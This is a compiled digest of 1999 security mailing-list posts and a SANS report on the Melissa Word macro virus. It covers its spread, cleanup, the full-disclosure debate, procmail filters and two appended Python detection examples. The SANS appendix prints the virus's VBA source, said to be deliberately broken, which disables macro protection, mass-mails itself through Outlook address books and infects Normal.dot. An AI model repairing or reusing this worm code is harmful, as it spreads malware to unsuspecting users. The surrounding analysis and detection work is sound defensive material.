The Melissa "virus" isn't just an ordinary "word processor" macro but rather a Visual BASIC Application extension thing that gets run by the application when the document is open. According to CERT neither Word97 nor Word2000 list the macro when an infected document is opened with macros disabled, even if you explicitly look for macros -- i.e. you can only see the macro if you let it execute. This is absurdly stupid.
(And of course what's also insidious, and new to me, about this "virus" is that it immediately and silently disables the feature which would normally require confirmation before executing macros, thus opening up the door for its simpler brethren, so to speak.)

--
Greg A. Woods
+1 416 218-0098 VE3TCP Planix, Inc. ; Secrets of the Weird

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 21:58:17 -0800
From: Nate Lawson
To: BUGTRAQ@netspace.org
Subject: Malicious code detection and full disclosure

I have been getting a lot of flames and veiled threats from individuals and "virus researchers" for posting the code yesterday. There seems to be a lot of misinformation going around so I wanted to clarify the situation. These people are all producing the same arguments:

1. "Posting the source allows someone to know how to write a Macro virus"

Yes, and any one of the 100,000 or more people who got the virus the other day can buy VB and do File->Open and see the source. Repeat after me: "Word macros are INTERPRETED". All symbol information is present. No decompilation necessary.

2. "By reformatting the source, you have created a new variant"

What? Your virus scanner could be thwarted by adding whitespace? Someone has a problem but it isn't me. Perhaps you'd best learn from the sandbox mechanisms of Java or virus scanners like F-PROT. A virus is not a virus because it has the string "By 3le3t3 DudEZ" followed by three tabs. It is a virus because it does things like update Normal.dot. Repeat after me: "Pattern matching alone does not a virus scanner make".

Just as in the recent thread about security scanners doing version-checking instead of exploiting a hole, the best answer is to use a combination of techniques to identify flaws or malicious code and then notify the user of any uncertainties in the detection mechanism.

A perfect parallel to this is the Internet worm.
We were reminded of that time as we paused the Exchange SMTP service to keep the program from spreading. Also, it was important to quickly analyze the program, making sure it did nothing malicious like mailing a person's files to another location. After doing this, I believed the code itself would help others do the same if they needed to. An important note is that the Symantec and McAfee web pages describing the virus both left out important information (for instance, avertlabs.com neglected to mention the active document and Normal.dot file infection). If I had made any mistakes in my analysis, another could have determined this for himself.

A good reference is the paper "With Microscope and Tweezers, An Analysis of the Internet Worm" by Mark Eichin and Jon Rochlis. It can be found at:

    http://www.mit.edu:8001/people/eichin/www/virus/main.html

In short, this is the same full disclosure vs. security through obscurity debate. Make your own decision what is appropriate; my mind has been made up in regards to this for at least a decade.

Viruses tend to be uninventive and boring. This one was extremely unsophisticated, exploited no new holes, and required user carelessness to spread. I only got involved because I had to help fend off the nuisance Friday.

I hope everyone found the postings useful and will demand better virus protection than string matching from their virus scanner vendor as well as request that Microsoft add more virus prevention than "enable macros? yes/no" and disallow macros from doing things like sending mail or writing to files without notice to the user.

-Nate

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 20:12:22 -0800
From: John D. Hardin
To: BUGTRAQ@netspace.org
Subject: Re: Blocking the Melissa Trojan

On Sat, 27 Mar 1999, Brett Glass wrote:

>At 03:28 PM 3/27/99 -0800, John D. Hardin wrote:
>>On Sat, 27 Mar 1999, Brett Glass wrote:
>>
>>> Excellent.
>>> Is there a default "poisoned executables" file in the
>>> package? Or do admins have to construct a list themselves?
>>
>>They have to make it themselves if they wish to use the facility. The
>>web page has a suggested list of filenames.
>
> Sounds good. Now, for the next twist to the story.
>
> It turns out that the Melissa code also infects NORMAL.DOT, so that
> the computer starts producing infected documents. When one of those
> documents hits a machine that hasn't been infected yet, that machine
> sends out a barrage of e-mail.... Using the NEW document as the
> attachment! It'll have a different name. So, we also need to filter
> by subject and body.

That's a job that regular procmail is well suited to. If the subject is fixed (hang on, reading bugtraq...) Per Aleph1:

    The subject line is "important Message From ". The body consists of the text "Here is that document you asked for... don't show anyone else;-)".

That's fairly simple...

:0 H
* ^Subject:.*important Message From
{
  :0 B
  * Here is that document you asked for
  * don't show anyone else
  * ^Content-.*: .*\.do[ct]
  {
    LOG='REJECT Possible "Melissa" Microsoft Word macro worm: '
    :0
    security-quarantine
  }
}

--
John Hardin KA7OHZ                                 jhardin@wolfenet.com
pgpk -a finger://gonzo.wolfenet.com/jhardin
PGP key ID: 0x41EA94F5
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5  E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
In the Lion the Mighty Lion the Zebra sleeps tonight...
Dee de-ee-ee-ee-ee de de de we um umma way!
-----------------------------------------------------------------------
52 days until Star Wars episode I

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 12:16:29 +0000
From: Vesselin Bontchev
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: [BugTraq] Melissa Macro Virus (fwd)

Aaron Wood writes (my comments are on Trend's press release forwarded by him):

> In Word97, the virus disables the Tools/Macro menu commands, the
> Confirm Conversions option, the MS Word macro virus protection, and
> the Save Normal Template prompt.

In Word 2000, the virus disables the Tools/Macro/Security menu.

> The name of the original infected attachment was List.doc, but it
> could be any name.

Theoretically, yes. But keep in mind that the virus sends itself by e-mail only when it infects a clean system. What it sends is the document which has infected the system. Originally, the virus was distributed in a file named LIST.DOC and posted to alt.sex by a person known to have posted new viruses to the newsgroups before. So, in most cases this is the document which infects the systems for the first time and it is what is sent around. The only way to begin sending something else is if you get infected by opening another user's infected document which you have received by other means (i.e., not by the virus sending it to you).

> If the user does not have Outlook, the virus will not work.

That's not true - the virus works perfectly, in the sense that it replicates and infects. It just can't send itself around in e-mail attachments. But, as we know, this is by far not the only way a virus can use to spread. :-)

Another thing - the virus never terminates the copy of Outlook it starts - at least not explicitly. I haven't verified that, but if that copy really remains in memory, opening several infected documents would eventually slow down and crash your system - because of the many copies of Outlook running in the background.
The virus starts Outlook each time you open an infected document - although it sends itself by e-mail only if the system wasn't already infected.

> After that, the virus checks to see if the normal template and active
> document are infected, and if either is not, it infects the file.

"File" here means "whatever is not infected - either the active document or the normal template".

> Trend Micro has detection for this virus in its latest pattern update,

Most anti-virus producers have. The update for our product (F-PROT and F-MACROW) can be found at the usual place:

    ftp://ftp.complex.is/pub/macrdef2.zip

Regards,
Vesselin

--
Vesselin Vladimirov Bontchev, not speaking for FRISK Software International,
Postholf 7180, IS-127, Reykjavik, Iceland, producers of F-PROT.
e-mail: bontchev@complex.is, tel.: +354-561-7273, fax: +354-561-7274
PGP 2.6.2i key fingerprint: E5 FB 30 0C D4 AA AB 44  E5 F7 C3 18 EA 2B AE 4E

----------------------------------------------------------------------------

Date: Mon, 29 Mar 1999 14:46:24 -0500 (EST)
From: sans@clark.net
Subject: EXTRA: SANS Flash Report on the Melissa Virus

Once or twice a year, the magnitude of a security event is great enough to merit a SANS Flash Report. It is amazing and coincidental that it happens in the same 24 hour period that we send out the first SANS Newsbites.

NOTE: SANS will be changing email and web servers this week. We hope to avoid service interruptions, but some error might creep in. Problems to .

Table of Contents:

1. What Melissa teaches us
   1.1 Infection Speed
   1.2 Collateral Damage
   1.3 Need for Defense in Depth
2. One site's experience in cleaning up after a Melissa infestation
3. Conclusion
Appendix: Melissa Source Code

You will already have heard of the Melissa virus, at least from the SANS Newsbites, and probably also from newspapers and friends, as well.
An excellent description of the virus, including how to identify it and contain it at the host level, was developed by the Computer Emergency Response Team at Carnegie Mellon University. This document is available at:

    http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html

The major anti-virus vendors have already released descriptions and anti-viral signatures. URLs for NAI and Symantec are listed below:

    http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp
    http://www.symantec.com/avcenter/venc/data/mailissa.html

The rapid response of these organizations has been very impressive, and your response should be equally rapid. If you have not yet taken the steps described in the CERT advisory, follow the instructions referenced above and get your site's virus signatures updated and the infected machines contained and cleaned. Then read the rest of this document that tells some of the lessons learned and also the bigger picture surrounding the Melissa Macro virus. We discuss the implications of information gathering viruses like Melissa, the process and impact of cleaning up after an outbreak at a military site and finally, share a non-working version of the code to help you understand what these viruses do.

1. What Melissa teaches us

1.1 Infection Speed

According to NAI's web site listed above, the virus was first discovered on an "alt.sex" newsgroup and spread rapidly. On the same day the virus was first discovered "in the wild" it caused major infections and reports from a large number of Department of Defense and Department of Energy sites. Many of you will probably find out today that your site has been infected as well. This serves as a warning how fast a virus with an unknown signature can spread. A modified, non-operative copy of the source code is included as an appendix to this document.
If you search the listing for the string "For y = 1 To", you can see how the virus replicated so rapidly by going through Microsoft Outlook address books and sending itself to the first 50 entries in each book. Sections in the code that have been the subject of news reports are marked with comments that begin with ***.

Useful Background Information: In the March 2nd SANS First Tuesday Intrusion Detection Web Broadcast, archived at http://www.sans.org/webarchives.htm, Stephen Northcutt described another MS Word Macro Virus, M97.Marker.a. Marker is an information gathering virus which uses FTP to send the Microsoft Office registration information of infected systems to outside organizations. Northcutt described how this same technique would allow a prospective attacker to develop an infection map and, by knowing who sends what to whom, to target future attacks.

1.2 Collateral Damage

The Melissa virus apparently does not create any other damage in the sense of deleting, or stealing files. However, when the smoke clears, the cost of dealing with Melissa will be measured in the millions of dollars. It also directly affects sites' ability to send and receive email. One network engineer, who worked at one of the first sites to report the problem last Friday March 26, said "I knew something was wrong before I knew what was wrong. I could feel the network going slower and slower. As I looked into it, I found the exchange mail servers were melting down."

One of the lessons of Melissa is that a macro virus can hit very fast and very hard. The engineer went on to say, "As I composed the last email of the day, a message hit the Inbox of my Microsoft Outlook email application. The subject line read: "Important Message From [Jane Doe]". I viewed the message, and the body read "Here is that document you asked for... don't show anyone else ;-)" Attached was a Microsoft Word document titled "list1.doc".
"Although I hadn't requested any documents from [Jane Doe], I was expecting a couple of them from other people. It wasn't inconceivable to think that she had become involved, even though I didn't know who she was. I double-clicked on the Word document. A pop-up window appeared, warning me that a macro was contained in the document, and that macros can potentially be dangerous. I knew that... :-) So, I shut down the Word application, and checked the document with several of the virus detection packages that I had. Everything appeared clean."

"Since this was from someone in my organization, apparently a trusted source, I went ahead and opened the document with the macros enabled. In less than a second, a duplicate of the message had hit my mailbox, this time with my name attached. I hit the power-off button on my computer, but it was late. The payload had been delivered. My name was now attached to a file containing pornographic web sites, and an apparent username and password for each site. Moments later, duplicate messages from others who had made the same mistake began to appear."

"At this point I knew we, as an organization, were in trouble. This virus (or worm) was snowballing fast, too fast. I immediately called our information systems security manager, only to find that his phone was already busy. I left a voicemail detailing my appraisal of the situation, and my fear that this incident could get serious... very quickly. What I didn't know was that I was too late, it was already *very* serious."

1.3 Need for Defense in Depth

Though Melissa is primarily spread by e-mail, passing an infected floppy disk works just as well to move the virus to a new system, possibly even a new organization. If there was ever any doubt about whether we need to take virus countermeasures seriously, that time is past.
We recommend virus scanning at the firewall, on servers, and on the desktop systems as well as physical entry points for magnetic media for sites that want to avoid the kind of punch Melissa exhibited.

2. One site's experience in cleaning up after a Melissa infestation

Here's a first-person description of the process one site used to clean up after being hit by Melissa.

"As soon as we discovered the virus late Friday afternoon, we disconnected our servers (all SMTP relays and Exchange servers at our Internet connection) from the network until we could contain the infection. This happened at approximately 1800 hours Friday.

"System administrators for both corporate and departmental Exchange servers worked through Friday night and well into Saturday. Many returned Saturday and again on Sunday to complete the isolation and cleanup. They cleaned up the Exchange servers with updated anti-viral signatures as soon as they were available. The corporate servers and one departmental server were ready to come back on-line late Sunday. We left IMS (Internet Mail Service) disabled until we could contain (filter) email at the SMTP server.

"Our version of sendmail is one removed from the latest and filter updates provided by the author would not work on our version. We resorted to getting the word out for ALL users to update the AV signatures and refrain from sending Word docs until any with macros had been identified as coming from trusted sources. The administrator for the SMTP relay host downloaded a trial version of InterScan VirusWall from TrendMicro. For more info, see:

    http://www.antivirus.com/products/isvw/index.htm

"The clean-up picture would have been much bleaker if we hadn't had so many things in our favor:

* System administrators were still at work when the problem started (approximately 1640 on Friday).
* Most of the users were gone for the weekend (and didn't compound the problem by manually sending additional copies of the infected document).
* All of the system administrators involved in the clean up had been trained in incident handling based on the SANS' Incident Handling Step by Step approach.
* The person who needed to make key decisions was trained in incident response and had already begun carrying a cell phone.
* Base commanders recognized the expertise that was in use and supported the Incident Handling team by not directing what needed to be done (at least so far)."

Note: The stages of incident handling are: preparation, identification, containment, eradication, and follow-up. The URLs at the beginning of this document can help you with identification and eradication. Your organization may need to consider email server down time in order to achieve containment. You may also want to consider setting up non-email communication channels for your organization. If you do not know how to build a telephone call tree, look for a "soccer mom". They know how to spread important information very efficiently. In this way, if you do suffer an email meltdown, you can still get important information, such as where to acquire the latest anti-virus software, to your users.

3. Conclusion

Because Melissa exploits one of the most valuable benefits of the net -- the ability to share documents -- to propagate and to multiply itself, it will affect far more people far more quickly than earlier viruses. The silver lining in this cloud is that a relatively benign virus like Melissa is a low-cost way of gaining user awareness. That same mechanism can be used by a more malicious attacker to make private information public and to destroy large amounts of important data.
It makes sense for you to use this opportunity to establish three capabilities if you have not already done so:

(1) user responsibility and active involvement in protecting their systems
(2) an incident handling capability (Order Incident Handling Step-by-Step from the SANS bookstore www.sans.org if you don't already have a roadmap)
(3) user awareness of what to look for, whom to call, and what to say when they call about a security threat.

In addition, we at SANS want to hear your experiences and the lessons you learned in responding to Melissa. Please send your Melissa-related tips, tricks, techniques, experiences and lessons learned to info@sans.org with Melissa in the subject line. This type of sharing can help all sites be in a better position to respond the next time an event like this occurs.

Appendix: Melissa Source Code

NOTE: Several errors have been introduced into this copy of the code as a safety measure. It will not run in this form. We hope the code we changed will not overly impact your opportunity to understand how the software works, but we could not be responsible for furthering the spread of the live version of Melissa.
Text comments have been inserted at the "famous" locations, preceded by three asterisks "***".

*** Begins by checking security, the environment, and whether already infected

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
    CommandBars("Tools").Controls("Macro").Enabled = False
    Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
    If UngaDasOutlook = "Inlook" Then
        DasMapName.Logon "profile", "password"
        For y = 1 To DasMapName.AddressLists.Count
            Set AddyBook = DasMapiName.AddressLists(y)
            Set BreakOffASlice = UngaDasOutlook.CreateItem(0)
            For oo = 1 To AddyBook.AddressEntries.Count
                Peep = AddyBook.AddressEntries(x)
                BreakOffASlice.Recipients.Add Peep
                x++
                If x < 50 Then oo = AddyBook.AddressEntries.Count
            Next oo
            BreakOffASlice.Subject = "Important Message From " & Application.UserName
            BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"

*** Here is the classic subject line "Important Message From". This could change of course in future versions ***

            BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
            BreakUmOffASlice.Send
            Peep = ""
        Next y
        DasMapName.Logoff
    End If
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If

Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2

If ADI1.Name <> "Melissa" Then
    If ADCL > 0 Then _
        ADI1.CodeModule.DeleteLines 1, ADCL
    Set ToInfect = ADI1
    ADI1.Name = "Melissa"
    DoAD = True
End If

If NTI1.Name <> "Melissa" Then
    If NTCL > 0 Then _
        NTI1.CodeModule.DeleteLines 1, NTCL
    Set ToInfect = NTI1
    NTI1.Name = "Melissa"
    DoNT = True
End If

If DoNT <> True And DoAD <> True Then GoTo END

If DoNT = True Then
    Do While ADI1.CodeModule.Lines(1, 1) = ""
        ADI1.CodeModule.DeleteLines 1
    Loop
    ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
    Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
        ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
        BGN = BGN + 1
    Loop
End If

If DoAD = True Then
    Do While NTI1.CodeModule.Lines(1, 1) = ""
        NTI1.CodeModule.DeleteLines 1
    Loop
    ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
    Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
        ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(END, 1)
        BGN = BGN + 1
    Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
    ActiveDocument.Saved = True
End If

'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."

End Sub

*** The lines above are some of the most published information about this virus.
Though you can look for the virus with intrusion detection and other string matching security tools by searching for keywords like "Kwyjibo", simple modifications of the code could change these. ***

----------------------------------------------------------------------------

Date: Sun, 28 Mar 1999 21:40:59 -0600
From: Simple Nomad
To: BUGTRAQ@netspace.org
Subject: "Leaking" of docs via Melissa

An interesting thing -- as users are infected with Melissa some of the new documents they create after infection become the carrier and are mailed out. If you scan for inbound messages, it would be advised to scan for outbound messages as well. I received a copy of an employee evaluation from an old client, and considering the poor rating of this guy I'd say there's a lawsuit in the making as it apparently went not only to me but to an internal email bulletin board.

Simple Nomad // thegnome@nmrc.org // ....no rest for the Wicca'd.... www.nmrc.org //
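The mail-side checks discussed in this digest (Scott Hutton's sendmail subject rule in the CIAC bulletin, John Hardin's procmail recipe matching subject, body and a .doc/.dot attachment, and Simple Nomad's point that outbound mail needs the same scan) re-implemented as an added example in Python's standard library. This is not code from any of the posts; the sample messages, addresses and the attachment bytes are constructed for the example.

```python
"""Melissa-style mail filter (added example; not code from the posts above)."""
import email
import re
from email import policy
from email.message import EmailMessage

# Aleph1 quoted the subject as "important Message From" with a lower-case "i",
# so match case-insensitively, anchored at the start as the sendmail rule is.
SUBJECT_RE = re.compile(r"^\s*important message from\b", re.IGNORECASE)
# Both phrases from Hardin's body test.
BODY_PHRASES = ("here is that document you asked for", "don't show anyone else")
# Hardin's "\.do[ct]": Word documents and templates, whatever the file is called.
DOC_EXT_RE = re.compile(r"\.do[ct]$", re.IGNORECASE)


def _attachment_names(msg):
    return [p.get_filename() for p in msg.walk() if p.get_filename()]


def _text_body(msg):
    parts = [p.get_content() for p in msg.walk()
             if p.get_content_type() == "text/plain" and not p.get_filename()]
    return "\n".join(parts)


def classify(raw):
    """Return which indicators a raw RFC822 message hits and the two verdicts.

    'quarantine' mirrors the procmail recipe: all three indicators must match.
    'subject_only_reject' mirrors the sendmail.cf rule, which the CIAC text
    warns may be too rash because it also blocks legitimate mail.
    Apply it to outbound mail too: an infected Normal.dot mails out new documents.
    """
    msg = email.message_from_string(raw, policy=policy.default)
    subject = str(msg.get("Subject", ""))
    body = _text_body(msg).lower()
    hits = {
        "subject": bool(SUBJECT_RE.search(subject)),
        "body": all(phrase in body for phrase in BODY_PHRASES),
        "doc_attachment": any(DOC_EXT_RE.search(n) for n in _attachment_names(msg)),
    }
    hits["quarantine"] = hits["subject"] and hits["body"] and hits["doc_attachment"]
    hits["subject_only_reject"] = hits["subject"]
    return hits


def build_sample(subject, body, attachment_name=None):
    """Construct a sample message for the example (addresses are placeholders)."""
    m = EmailMessage()
    m["From"] = "jane.doe@example.invalid"
    m["To"] = "admin@example.invalid"
    m["Subject"] = subject
    m.set_content(body)
    if attachment_name:
        # A few dummy bytes stand in for the Word file; only the name matters here.
        m.add_attachment(b"\xd0\xcf\x11\xe0 constructed dummy", maintype="application",
                         subtype="msword", filename=attachment_name)
    return m.as_string()


# Constructed samples: the original carrier, a renamed carrier produced by an
# infected Normal.dot (Brett Glass's "next twist"), and a legitimate message
# whose subject happens to start the same way.
MELISSA_SAMPLE = build_sample("Important Message From Jane Doe",
                              "Here is that document you asked for ... don't show anyone else ;-)",
                              "list1.doc")
RENAMED_SAMPLE = build_sample("Important Message From Jane Doe",
                              "Here is that document you asked for ... don't show anyone else ;-)",
                              "evaluation.doc")
BENIGN_SAMPLE = build_sample("Important Message From HR: office closed Monday",
                             "The office is closed Monday for the holiday.")

if __name__ == "__main__":
    for name, raw in (("original", MELISSA_SAMPLE), ("renamed", RENAMED_SAMPLE),
                      ("benign", BENIGN_SAMPLE)):
        print(name, classify(raw))
```

The benign sample shows the difference between the two rules: the subject-only sendmail rule rejects it, the three-part procmail test does not.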
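Nate Lawson's post argues that "pattern matching alone does not a virus scanner make", and the SANS appendix note adds that a marker string like "Kwyjibo" is trivial to change. The following added example (not code from any post) triages VBA source by the behaviours the Melissa listing exhibits rather than by names or strings; the indicator list, weights, threshold and both sample macros are constructed for the example, and the second sample is a non-working fragment with renamed identifiers and no marker string.

```python
"""Behaviour-based VBA macro triage (added example; not code from the posts)."""
import re

# (name, regex over the VBA text, weight). The patterns match API usage the
# listing relies on, so renaming variables or dropping "Kwyjibo" does not help.
INDICATORS = [
    ("auto_exec", r"\bSub\s+(Document_Open|Document_Close|AutoOpen|AutoClose|AutoExec)\b", 1),
    ("disables_protection", r"Options\.VirusProtection\s*=|Word\\Security.*\"Level\"\)\s*=", 3),
    ("hides_macro_menu", r"CommandBars\(\"(Tools|Macro)\"\)\.Controls\(.*\)\.Enabled\s*=\s*False", 2),
    ("outlook_automation", r"CreateObject\(\s*\"Outlook\.Application\"\s*\)", 2),
    ("sends_mail", r"\.Recipients\.Add\b|\.Send\b", 2),
    ("attaches_self", r"Attachments\.Add\s+ActiveDocument\.FullName", 2),
    ("infects_normal", r"NormalTemplate\.VBProject\b", 3),
    ("rewrites_code", r"CodeModule\.(AddFromString|InsertLines|DeleteLines)\b", 2),
    ("silences_errors", r"^\s*On Error Resume Next\b", 1),
]
COMPILED = [(n, re.compile(p, re.IGNORECASE | re.MULTILINE), w) for n, p, w in INDICATORS]
SUSPICIOUS_SCORE = 6  # threshold chosen for the example, not a vendor value


def indicators(vba):
    """Names of the behaviour indicators present in a VBA source text."""
    return [name for name, rx, _ in COMPILED if rx.search(vba)]


def score(vba):
    return sum(w for _, rx, w in COMPILED if rx.search(vba))


def is_suspicious(vba):
    """Flag a macro that runs automatically and also tampers with protection,
    automates mail, or writes code into Normal.dot. Auto-execution alone
    (a header stamp on open, say) is not enough."""
    found = set(indicators(vba))
    if "auto_exec" not in found:
        return False
    risky = {"disables_protection", "hides_macro_menu", "outlook_automation",
             "sends_mail", "infects_normal", "rewrites_code"}
    return bool(found & risky) and score(vba) >= SUSPICIOUS_SCORE


def string_signature_hit(vba, marker="Kwyjibo"):
    """The string-matching approach the SANS note warns is easy to evade."""
    return marker in vba


# Constructed sample: a benign auto-open macro that stamps a draft header.
BENIGN_MACRO = '''
Private Sub Document_Open()
    ActiveDocument.Sections(1).Headers(1).Range.Text = "DRAFT"
End Sub
'''

# Constructed sample: the listing's behaviours with every identifier changed
# and no marker string. It is a fragment for the scanner to read, not a macro
# that does anything; recipient handling and the rest are deliberately absent.
RENAMED_FRAGMENT = '''
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = (1 - 1)
Set a1 = CreateObject("Outlook.Application")
Set m1 = a1.CreateItem(0)
' ... omitted ...
m1.Attachments.Add ActiveDocument.FullName
m1.Send
Set t1 = NormalTemplate.VBProject.VBComponents.Item(1)
t1.CodeModule.AddFromString ("Private Sub Document_Close()")
End Sub
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_MACRO), ("renamed", RENAMED_FRAGMENT)):
        print(label, score(src), is_suspicious(src), string_signature_hit(src), indicators(src))
```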